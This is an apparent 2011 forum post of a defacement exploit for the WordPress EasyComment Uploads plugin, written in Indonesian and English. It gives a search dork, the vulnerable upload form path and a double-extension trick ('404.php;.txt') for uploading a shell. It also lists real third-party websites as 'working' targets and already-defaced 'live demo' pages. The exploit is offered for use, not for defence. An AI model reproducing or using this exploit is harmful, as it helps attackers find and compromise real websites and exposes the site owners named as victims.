[POC] Exploit Wordpress

Deface wp extensi jpg, txt, bmp, gif
----------------------------------------------------------------------------
| Title : Wordpress Plugin EasyComment Upload Vulnerability
| Author: Z190T
| Vendor: http://wordpress.org/extend/plugins/eas ... t-uploads/
| Email : me@zonedevil.om
| Date : 15/06/2011
| Dork : "/easy-comment-uploads/upload-form.php"
| Category : PHP [File Upload Vulnerability]
| Tested on: [Windows XP3, Linux Fedora, PCLinuxOS]
----------------------------------------------------------------------------


*_Exploit_*

# http://[localhost]/[path]/easy-comment-uploads/upload-form.php
# http://[localhost]/easy-comment-uploads/upload-form.php

contoh work:

http://accentspaintingplus.com/wp-conten...d-form.php
http://eleventigers.net/111/wp-content/p...d-form.php
http://infusiondesigns.us/grubby/wp-cont...d-form.php

# File Extention [.txt],[.jpg],[gif],[bmp]


*_Preview_*

# site/wp-content/uploads/[years]/[month]/[yourshell]
# example: site/wp-content/uploads/2011/06/404.php;.txt

detailnya: situsnya.com/wp-content/uploads/2011/06/namafilekamu.txt

=========================================================

Live Demo :

Code:

- http://www.recycledbride.com/blog/wp-content/uploads/2011/06/n4is3n.txt
- http://www.mysodes.tv/wp-content/uploads/2011/06/n4is3n.txt
- http://objekt.com.au/wp-content/uploads/2011/06/n4is3n.txt
- http://h00rj.com/wp-content/uploads/2011/06/n4is3n.txt
- http://www.chetthedog.com/wp-content/uploads/2011/06/n4is3n.txt
- http://www.punjabicomments.co.cc/wp-content/uploads/2011/06/n4is3n.txt
- http://bgprogression.com/wp-content/uploads/2011/06/n4is3n.txt
- http://www.deathvalleymag.com/wp-content/uploads/2011/06/n4is3n.txt
- http://www.serpholicmedia.com/wp-content/uploads/2011/06/n4is3n.txt
- http://maratona.mobi/wp-content/uploads/2011/06/n4is3n.txt

---

//---------------------------------------------------------------------------------\\